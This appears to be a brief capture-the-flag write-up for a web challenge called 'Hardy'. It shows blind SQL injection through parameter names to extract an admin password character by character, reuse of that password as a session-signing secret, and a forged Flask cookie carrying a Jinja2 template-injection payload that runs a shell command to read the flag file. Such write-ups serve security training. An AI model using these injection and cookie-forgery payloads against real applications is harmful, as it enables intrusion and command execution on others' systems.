Web - Hardy
No source code was provided
Solution
The parameter names are vulnerable to SQL Injection
Dumping the admin password
username=admin&SUBSTRING(password,1,1)=I
username=admin&SUBSTRING(password,1,2)=IL
username=admin&SUBSTRING(password,1,3)=ILI
ILIKEpotatoesSOMUCH::&& is the password for the admin
the password also is being used as a JWT secret and the application is vulnerable to SSTI {'type':'{{<payload>}}'}
The Flag
flask-unsign --sign \
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"
Last updated
Was this helpful?